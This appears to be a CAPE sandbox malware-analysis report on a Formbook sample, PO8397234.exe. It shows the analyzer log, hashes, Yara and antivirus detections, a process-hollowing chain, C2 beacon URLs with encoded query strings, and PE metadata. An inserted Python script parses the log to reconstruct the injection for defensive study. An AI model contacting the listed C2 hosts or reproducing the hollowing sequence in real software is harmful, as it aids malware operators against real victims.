2020-06-30 13:48:07,093 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00E10000.
2020-06-30 13:48:07,093 [root] DEBUG: LooksLikeSectionBoundary: Exception occured reading around suspected boundary at 0x00E12000
2020-06-30 13:48:07,093 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2020-06-30 13:48:07,109 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x00E10000.
2020-06-30 13:48:07,109 [root] DEBUG: DumpPE: Empty or inaccessible last section, file image seems incomplete (from 0x00E59200 to 0x00E59400).
2020-06-30 13:48:07,125 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4740_4032622747482030262020 (size 0x5c8)
2020-06-30 13:48:07,125 [root] DEBUG: DumpRegion: Dumped stack region from 0x008F0000, size 0x1000.
2020-06-30 13:48:07,140 [root] DEBUG: DumpPE: Error: Cannot dump PE file from memory.
2020-06-30 13:48:07,140 [root] DEBUG: DumpImageInCurrentProcess: Failed to dump 'raw' PE image from 0x00E10000, dumping memory region.
2020-06-30 13:48:07,156 [root] DEBUG: DLL unloaded from 0x76490000.
2020-06-30 13:48:07,156 [root] DEBUG: DLL unloaded from 0x0FE60000.
2020-06-30 13:48:07,156 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4740_11152062897482030262020 (size 0x12b)
2020-06-30 13:48:07,156 [root] DEBUG: DumpRegion: Dumped stack region from 0x00030000, size 0x1000.
2020-06-30 13:48:07,156 [root] DEBUG: DLL unloaded from 0x6B910000.
2020-06-30 13:48:07,171 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 4460
2020-06-30 13:48:07,187 [root] DEBUG: DLL loaded at 0x00700000: C:\tmp2ylp3rhi\dll\mwMhyAcm (0xd5000 bytes).
2020-06-30 13:48:11,343 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 4740
2020-06-30 13:48:11,390 [root] DEBUG: GetHookCallerBase: thread 4708 (handle 0x0), return address 0x00417A0A, allocation base 0x00400000.
2020-06-30 13:51:14,046 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-30 13:51:14,062 [lib.api.process] ERROR: Failed to open terminate event for pid 4460
2020-06-30 13:51:14,093 [root] INFO: Terminate event set for process 4460.
2020-06-30 13:51:14,093 [lib.api.process] ERROR: Failed to open terminate event for pid 4740
2020-06-30 13:51:14,093 [root] INFO: Terminate event set for process 4740.
2020-06-30 13:51:14,093 [root] INFO: Created shutdown mutex.
2020-06-30 13:51:15,093 [root] INFO: Shutting down package.
2020-06-30 13:51:15,093 [root] INFO: Stopping auxiliary modules.
2020-06-30 13:51:15,203 [lib.common.results] WARNING: File C:\YCyAWu\bin\procmon.xml doesn't exist anymore
2020-06-30 13:51:15,203 [root] INFO: Finishing auxiliary modules.
2020-06-30 13:51:15,203 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-06-30 13:51:15,203 [root] WARNING: Folder at path "C:\YCyAWu\debugger" does not exist, skip.
2020-06-30 13:51:15,218 [root] INFO: Analysis completed.
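The analyzer log above records a process-hollowing sequence spread over many lines: the .NET parent (pid 4460) creates a second PO8397234.exe (pid 4740) with its original image base 0x00E10000, writes a full PE into it at 0x400000 (CAPE dumps it, SizeOfImage 0x27000), writes a 0x26000-byte shellcode buffer, resets the suspended thread's entry point via NtSetContextThread, and only then does CAPE's loader get its monitor in (after three failed attempts with return code 4294967281). The script below is an added example, not CAPE's own code and not part of this report; it parses that log format and folds the scattered CreateProcessHandler / WriteMemoryHandler / SetThreadContextHandler lines into one record per target process so the chain can be asserted on rather than read by eye. SAMPLE_LOG is excerpted verbatim from the log above; the event names and record fields are the script's own.

```python
"""Reconstruct a process-hollowing chain from CAPE analyzer log lines.
Added example (not CAPE's code, not from the report above). SAMPLE_LOG is
excerpted verbatim from the log above; event names and record fields are
this script's own."""
import re
from collections import defaultdict

SAMPLE_LOG = r"""
2020-06-30 13:48:06,687 [root] DEBUG: CreateProcessHandler: Injection info set for new process 4740, ImageBase: 0x00E10000
2020-06-30 13:48:06,703 [root] DEBUG: WriteMemoryHandler: Executable binary injected into process 4740 (ImageBase 0x400000)
2020-06-30 13:48:06,734 [root] DEBUG: WriteMemoryHandler: Dumped PE image from buffer at 0x4ac0108, SizeOfImage 0x27000.
2020-06-30 13:48:06,796 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,796 [root] DEBUG: WriteMemoryHandler: shellcode at 0x04AE7328 (size 0x26000) injected into process 4740.
2020-06-30 13:48:06,828 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_91607809649482030262020 (size 0x25efe)
2020-06-30 13:48:06,859 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,906 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,906 [root] DEBUG: SetThreadContextHandler: Hollow process entry point reset via NtSetContextThread to 0x0001C160 (process 4740).
2020-06-30 13:48:07,015 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4740
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) \[(?P<src>[^\]]+)\] (?P<level>[A-Z]+): (?P<msg>.*)$")
HEX = r"0x[0-9A-Fa-f]+"
EVENT_RES = {  # first matching pattern wins
    "child":    re.compile(r"CreateProcessHandler: Injection info set for new process (?P<pid>\d+), ImageBase: (?P<base>%s)" % HEX),
    "write_pe": re.compile(r"WriteMemoryHandler: Executable binary injected into process (?P<pid>\d+) \(ImageBase (?P<base>%s)\)" % HEX),
    "pe_dump":  re.compile(r"Dumped PE image from buffer at (?P<buf>%s), SizeOfImage (?P<size>%s)" % (HEX, HEX)),
    "write_sc": re.compile(r"WriteMemoryHandler: shellcode at (?P<buf>%s) \(size (?P<size>%s)\) injected into process (?P<pid>\d+)" % (HEX, HEX)),
    "ctx":      re.compile(r"Hollow process entry point reset via NtSetContextThread to (?P<entry>%s) \(process (?P<pid>\d+)\)" % HEX),
    "inj_fail": re.compile(r"Unable to inject into 32-bit process with pid (?P<pid>\d+), error: (?P<err>\d+)"),
    "inj_ok":   re.compile(r"Injected into suspended 32-bit process with pid (?P<pid>\d+)"),
    "dump":     re.compile(r"CAPE output file successfully created: (?P<path>\S+) \(size (?P<size>%s)\)" % HEX),
}

def parse_log(text):
    """Recognised events in log order: timestamp, kind, and the matched groups."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            for kind, rx in EVENT_RES.items():
                em = rx.search(m["msg"])
                if em:
                    events.append({"ts": m["ts"], "kind": kind, **em.groupdict()})
                    break
    return events

def signed32(value):
    """The loader's return code is logged unsigned: 4294967281 is -15 as int32."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value

def summarize_hollowing(events):
    """One record per pid that received a write. is_hollowed needs the classic order:
    process registered -> PE written into it -> thread context (entry point) reset."""
    targets = defaultdict(lambda: {
        "original_base": None, "written_base": None, "pe_size": None,
        "shellcode_size": None, "entry_point": None, "inject_failures": 0,
        "inject_errors": set(), "monitor_loaded": False, "order": []})
    last_pe_target = None
    for ev in events:
        kind = ev["kind"]
        if kind == "pe_dump":  # names no pid: belongs to the preceding write_pe
            if last_pe_target is not None:
                targets[last_pe_target]["pe_size"] = int(ev["size"], 16)
            continue
        if "pid" not in ev:
            continue
        t = targets[int(ev["pid"])]
        t["order"].append(kind)
        if kind == "child":
            t["original_base"] = int(ev["base"], 16)
        elif kind == "write_pe":
            t["written_base"] = int(ev["base"], 16)
            last_pe_target = int(ev["pid"])
        elif kind == "write_sc":
            t["shellcode_size"] = int(ev["size"], 16)
        elif kind == "ctx":
            t["entry_point"] = int(ev["entry"], 16)
        elif kind == "inj_fail":
            t["inject_failures"] += 1
            t["inject_errors"].add(signed32(int(ev["err"])))
        elif kind == "inj_ok":
            t["monitor_loaded"] = True
    result = {}
    for pid, t in targets.items():
        o = t["order"]
        if not {"child", "write_pe", "write_sc", "ctx"} & set(o):
            continue  # only injection-status lines: not a hollowing target
        t["is_hollowed"] = "write_pe" in o and "ctx" in o and o.index("write_pe") < o.index("ctx")
        result[pid] = t
    return result

def cape_dumps(events):
    """(dumping pid, path, size) per CAPE output file; the file-name prefix is
    the pid of the process whose monitor wrote it (the parent here, not 4740)."""
    out = []
    for ev in events:
        if ev["kind"] == "dump":
            pid = int(ev["path"].rsplit("\\", 1)[-1].split("_", 1)[0])
            out.append((pid, ev["path"], int(ev["size"], 16)))
    return out

if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for pid, t in summarize_hollowing(evs).items():
        print(f"pid {pid}: hollowed={t['is_hollowed']} base {t['original_base']:#x} -> "
              f"{t['written_base']:#x} pe={t['pe_size']:#x} entry={t['entry_point']:#x} "
              f"failed_injections={t['inject_failures']} loader_rc={sorted(t['inject_errors'])}")
    for pid, path, size in cape_dumps(evs):
        print(f"dump by pid {pid}: {path} ({size:#x} bytes)")
```

Run against the full log, the record for pid 4740 is the piece of evidence worth keeping: the written base (0x400000) differs from the base the child was created with (0x00E10000), and the dump that the Yara rules later fire on is attributed to pid 4460 because the parent's monitor captured it from the parent's buffer, which is why the Formbook hit in the Signatures section is listed against 4460 rather than the hollowed child.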

Machine

Name win7_2
Label win7_2
Manager KVM
Started On 2020-06-30 13:54:16
Shutdown On 2020-06-30 13:59:30

File Details

File Name PO8397234.exe
File Size 300032 bytes
File Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
PE timestamp 2020-06-30 07:13:04
MD5 38bcdd78a3aa9a815e7c5b09ffcafa1a
SHA1 125cab05a33197836b43307160177917027d9f96
SHA256 d2e60c3bec22bb8dc8e990920648725abd8ffdc1925dee26ed8c8187dd7504c1
SHA512 cbaedc53feb55139e952187bcfe3cd74461591419b31babd5124567cec04aedefbf6b7dad21dcc4aedac47ee5aec0a8e3762e9ba34ab44ceaef58a883c34e186
CRC32 64B8E7B1
Ssdeep 6144:EKRRhT7rYb8U8Rohqw8rJZ2IHO/I/FTC9zYr7b5:EKRRhT7B+85u/I/FTCWr7b5

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 4460 triggered the Yara rule 'shellcode_patterns'
Hit: PID 4460 triggered the Yara rule 'shellcode_get_eip'
Hit: PID 4460 triggered the Yara rule 'shellcode_stack_strings'
Hit: PID 4460 triggered the Yara rule 'Formbook'
Hit: PID 4460 triggered the Yara rule 'embedded_pe'
Creates RWX memory
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
CAPE extracted potentially suspicious content
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Formbook Payload
PO8397234.exe: Formbook
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Formbook Payload: 32-bit executable
PO8397234.exe: Formbook
PO8397234.exe: Unpacked Shellcode
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.magentos.info/b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP
suspicious_request: http://www.callisterlawgroup.com/b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H
suspicious_request: http://www.xinhby.com/b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Performs some HTTP requests
url: http://www.magentos.info/b6fg/
url: http://www.magentos.info/b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP
url: http://www.callisterlawgroup.com/b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H
url: http://www.xinhby.com/b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0
The binary likely contains encrypted or compressed data.
section: name: .text, entropy: 7.83, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00041000, virtual_size: 0x00040f00
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error: File not valid: C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe
Behavioural detection: Injection (Process Hollowing)
Injection: PO8397234.exe(4460) -> PO8397234.exe(4740)
Executed a process and injected code into it, probably while unpacking
Injection: PO8397234.exe(4460) -> PO8397234.exe(4740)
Behavioural detection: Injection (inter-process)
Network activity detected but not expressed in API logs
CAPE detected the Formbook malware family
File has been identified by 11 Antiviruses on VirusTotal as malicious
Cylance: Unsafe
Sangfor: Malware
APEX: Malicious
Paloalto: generic.ml
Kaspersky: UDS:DangerousObject.Multi.Generic
MaxSecure: Trojan.Malware.300983.susgen
Cyren: W32/MSIL_Troj.WM.gen!Eldorado
Microsoft: Trojan:Win32/Wacatac.C!ml
ZoneAlarm: UDS:DangerousObject.Multi.Generic
Malwarebytes: Trojan.MalPack.ADC
ESET-NOD32: a variant of MSIL/Kryptik.WPS
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - Various Malspam/RigEK

Hosts

Direct  IP              Country Name
Y       8.8.8.8         United States
N       50.63.202.41    United States
N       34.102.136.180  United States
N       199.192.30.223  United States
Y       1.1.1.1         Australia

DNS

Name                          Response            Post-Analysis Lookup
www.biblebeater.com           NXDOMAIN
www.296djw.info
www.belinv.com
www.magentos.info             A 199.192.30.223    199.192.30.223
www.callisterlawgroup.com     A 34.102.136.180    34.102.136.180
www.evntmonitor.com
www.xinhby.com                A 50.63.202.41      50.63.202.40
www.thekoulenresidence.com
www.8800pe.com
www.quantumpearlpoc.com
www.venglishhouse.com                             153.127.214.206
www.robynhoodofretail.info
www.mohajrannoor.com
www.sgknox.com                                    104.247.82.10
www.descubriendonoruega.com                       88.99.186.213

Summary
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\169BB6ED
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\FeatureSIMD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index224
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\169BB6ED
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
DisableUserModeCallbackFilter
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.SetDefaultDllDirectories
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.ReleaseSRWLockExclusive
advapi32.dll.EventRegister
advapi32.dll.EventSetInformation
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
user32.dll.GetProcessWindowStation
user32.dll.GetUserObjectInformationW
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.AddDllDirectory
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
kernel32.dll.GetFullPathNameW
uxtheme.dll.IsAppThemed
kernel32.dll.CreateActCtxA
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
user32.dll.RegisterWindowMessageW
ole32.dll.CoCreateGuid
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.CompareStringOrdinal
kernel32.dll.SetThreadErrorMode
kernel32.dll.GetFileAttributesExW
kernel32.dll.ResolveLocaleName
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipLoadImageFromStream
windowscodecs.dll.DllGetClassObject
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageType
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.CreateProcessW
kernel32.dll.GetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.WriteProcessMemory
kernel32.dll.SetThreadContext
kernel32.dll.ResumeThread
ole32.dll.CoWaitForMultipleHandles
advapi32.dll.EventUnregister
sechost.dll.LookupAccountNameLocalW
gdiplus.dll.GdipDisposeImage
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
cryptsp.dll.CryptReleaseContext
"{path}"
C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe "{path}"

BinGraph

PE Information

Image Base: 0x00400000
Entry Point: 0x00442efa
Reported Checksum: 0x00000000
Actual Checksum: 0x0004b291
Minimum OS Version: 4.0
Compile Time: 2020-06-30 07:13:04
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Icon Exact Hash: da86b69773b3d1a0cab558dba35d1d3e
Icon Similarity Hash: c8294825238e779bae8cb9c502157251

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00000200 0x00002000 0x00040f00 0x00041000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 7.83
.rsrc 0x00041200 0x00044000 0x00007fc0 0x00008000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.85
.reloc 0x00049200 0x0004c000 0x0000000c 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 0.10

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x00049490 0x000025a8 LANG_NEUTRAL SUBLANG_NEUTRAL 6.60 None
RT_ICON 0x00049490 0x000025a8 LANG_NEUTRAL SUBLANG_NEUTRAL 6.60 None
RT_ICON 0x00049490 0x000025a8 LANG_NEUTRAL SUBLANG_NEUTRAL 6.60 None
RT_GROUP_ICON 0x0004ba4c 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 2.46 None
RT_GROUP_ICON 0x0004ba4c 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 2.46 None
RT_VERSION 0x0004ba7c 0x00000356 LANG_NEUTRAL SUBLANG_NEUTRAL 3.37 None
RT_MANIFEST 0x0004bdd4 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL 5.00 None

Imports


Assembly Information

Name KLretdEyph
Version 1.98.4.0

Assembly References

Name Version
mscorlib 4.0.0.0
System.Windows.Forms 4.0.0.0
System 4.0.0.0
System.Drawing 4.0.0.0
System.Xml 4.0.0.0
System.Data 4.0.0.0

Custom Attributes

Type Name Value
Assembly [mscorlib]System.Reflection.AssemblyTitleAttribute Winform Sandb
Assembly [mscorlib]System.Reflection.AssemblyProductAttribute Winform Sandb
Assembly [mscorlib]System.Reflection.AssemblyCopyrightAttribute Copyright © 2017 - 20
Assembly [mscorlib]System.Runtime.InteropServices.GuidAttribute D7AFF0CC-F635-4140-A9B4-0FEA7D211F
Assembly [mscorlib]System.Reflection.AssemblyFileVersionAttribute 1.98.4

Type References

Assembly Type Name
mscorlib System.Runtime.CompilerServices.CompilationRelaxationsAttribute
mscorlib System.Runtime.CompilerServices.RuntimeCompatibilityAttribute
mscorlib System.Diagnostics.DebuggableAttribute
mscorlib System.Diagnostics.DebuggableAttribute/DebuggingModes
mscorlib System.Reflection.AssemblyTitleAttribute
mscorlib System.Reflection.AssemblyDescriptionAttribute
mscorlib System.Reflection.AssemblyConfigurationAttribute
mscorlib System.Reflection.AssemblyCompanyAttribute
mscorlib System.Reflection.AssemblyProductAttribute
mscorlib System.Reflection.AssemblyCopyrightAttribute
mscorlib System.Reflection.AssemblyTrademarkAttribute
mscorlib System.Runtime.InteropServices.ComVisibleAttribute
mscorlib System.Runtime.InteropServices.GuidAttribute
mscorlib System.Reflection.AssemblyFileVersionAttribute
